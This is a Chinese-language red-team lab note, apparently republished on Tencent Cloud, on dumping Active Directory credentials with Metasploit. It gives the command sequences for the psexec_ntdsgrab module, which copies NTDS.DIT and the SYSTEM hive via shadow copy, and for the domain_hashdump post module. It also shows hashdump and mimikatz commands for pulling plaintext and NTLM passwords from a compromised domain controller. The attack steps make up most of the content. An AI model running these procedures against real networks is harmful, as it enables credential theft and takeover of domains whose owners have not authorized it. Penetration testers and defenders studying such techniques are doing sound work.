前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >使用 Metasploit 获取哈希或域内哈希值

使用 Metasploit 获取哈希或域内哈希值

作者头像
渗透攻击红队
发布2020-12-14 11:36:56
1.6K0
发布2020-12-14 11:36:56
举报
文章被收录于专栏:漏洞知识库漏洞知识库

大家好,这里是 渗透攻击红队 的第 35 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

Metasploit

psexec_ntdsgrab 模块的使用

在 MSF 中使用 psexec_ntdsgrab 模块:

use auxiliary/admin/smb/psexec_ntdsgrab
set rhosts 192.168.2.25
set smbdomain god.org
set smbuser administrator
set smbpass Admin12345

设置完后然后执行 exploit 运行(要运行两次,该脚本使用卷影拷贝服务):

可以通过SMB服务直接与域控制器进行身份验证,创建系统驱动的卷影复制,并将NTDS.DIT和SYSTEM hive的副本下载到Metasploit目录中。这些文件可以与impacket等其他工具一起使用,这些工具可用于执行活动目录密码哈希值的提取。ntds.dit 和 SYSTEM会放在 /root/.msf4/loot/ 文件夹下:

之后就可以使用 impacket 工具包等解析 ntds.dit文件,导出域账号和域散列值了。

Metasploit 会话获取域账号和哈希值

首先是使用 msf 反弹了一个域控的 shell:

然后使用 MSF 的后渗透模块:

use post/windows/gather/credentials/domain_hashdump
set session 2

然后运行 exploit :

但是利用失败了,我也不知道为啥。

还可以使用 hashdump 来导出用户 hash:

还可以通过 MSF 加载 mimikatz 来读取密码:

# 加载mimikaz
load mimikatz
# 抓取明文密码
wdigest 
# 抓取明文密码
kerberos
# 抓取加密后的ntlm、lm密码
msv
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-11-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 渗透攻击红队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
访问管理
访问管理(Cloud Access Management,CAM)可以帮助您安全、便捷地管理对腾讯云服务和资源的访问。您可以使用CAM创建子用户、用户组和角色,并通过策略控制其访问范围。CAM支持用户和角色SSO能力,您可以根据具体管理场景针对性设置企业内用户和腾讯云的互通能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档